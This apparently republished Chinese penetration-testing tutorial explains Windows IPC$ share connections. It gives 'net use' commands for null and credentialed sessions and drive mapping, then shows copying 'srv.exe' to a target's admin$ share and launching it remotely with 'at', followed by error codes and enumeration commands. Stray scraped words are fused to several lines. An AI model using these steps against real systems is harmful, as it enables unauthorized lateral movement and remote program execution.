[內網滲透]IPC$共享鏈接

0x01 簡介

IPC$(Internet Process Connection)是共享」命名管道」的資源,它是爲了讓進程間通訊而開放的命名管道,能夠經過驗證用戶名和密碼得到相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。html

利用IPC$,鏈接者甚至能夠與目標主機創建一個鏈接,利用這個鏈接,鏈接者能夠獲得目標主機上的目錄結構、用戶列表等信息。ios

0x02 利用條件

1.139,445端口開啓
ipc$鏈接能夠實現遠程登錄及對默認共享的訪問;而139端口的開啓表示netbios協議的應用,咱們能夠經過139,445(win2000)端口實現對共享文件/打印機的訪問,所以通常來說,ipc$鏈接是須要139或445端口來支持的.windows

2.管理員開啓了默認共享 默認共享是爲了方便管理員遠程管理而默認開啓的共享,即全部的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),咱們經過ipc$鏈接能夠實現對這些默認共享的訪問網絡

0x03 操做命令

1.創建IPC$空鏈接

net use \\127.0.0.1\Iipc$ "" /user:""

2.創建完整的用戶名,密碼鏈接

net use \\127.0.0.1\ipc$ "password" /user:"username"

3.映射路徑

net use z: \\127.0.0.1\c$ "密碼" /user:"用戶名"  (便可將對方的c盤映射爲本身的z盤,其餘盤類推)

4.訪問/刪除路徑:

net use z: \\127.0.0.1\c$   #直接訪問
net use c: /del     刪除映射的c盤,其餘盤類推 
net use * /del      刪除所有,會有提示要求按y確認

5.刪除IPC$鏈接

net use \\127.0.0.1\ipc$ /del

0x04 使用實例

4.1 構建鏈接操作系統

C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

這裏密碼本來就是爲"空"code

4.2 上傳exeserver

C:\>copy srv.exe \\127.0.0.1\admin$

先複製srv.exe上去,(這裏的$是指admin用戶的c:\winnt\system32\,你們還可使用c$、d$,意思是C盤與D盤,這看你要複製到什麼地方去了)。htm

4.3 查看時間blog

C:\>net time \\127.0.0.1

查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。進程

4.4 運行程序

C:\>at \\127.0.0.1 11:05 srv.exe

用at命令啓動srv.exe吧(這裏設置的時間要比主機時間快,否則沒法啓動)

0x05 IPC$鏈接失敗的緣由

1.你的系統不是NT或以上操做系統. 2.對方沒有打開ipc$默認共享。 3.不能成功鏈接目標的139,445端口. 4.命令輸入錯誤. 5.用戶名或密碼錯誤.

0x06 常見錯誤號

1.錯誤號5,拒絕訪問:極可能你使用的用戶不是管理員權限的,先提高權限; 2.錯誤號51,Windows 沒法找到網絡路徑:網絡有問題; 3.錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啓動;目標有防火牆(端口過濾); 4.錯誤號67,找不到網絡名:你的lanmanworkstation服務未啓動;目標刪除了ipc$; 5.錯誤號1219,提供的憑據與已存在的憑據集衝突:你已經和對方創建了一個ipc$,請刪除再連。 6.錯誤號1326,未知的用戶名或錯誤密碼:緣由很明顯了; 7.錯誤號1792,試圖登陸,可是網絡登陸服務沒有啓動:目標NetLogon服務未啓動。(鏈接域控會出現此狀況) 8.錯誤號2242,此用戶的密碼已通過期:目標有賬號策略,強制按期要求更改密碼。

0x07 其餘知識點

net share       #查看本身的共享
net view \\IP   #查看target-IP的共享
netstat -A IP   #獲取target-IP的端口列表

netstat -ano | findstr "port"  #查看端口號對應的PID
tasklist | findstr "PID"       #查看進程號對應的程序

參考連接: http://www.javashuo.com/article/p-bwwbivwu-r.html

相關文章
相關標籤/搜索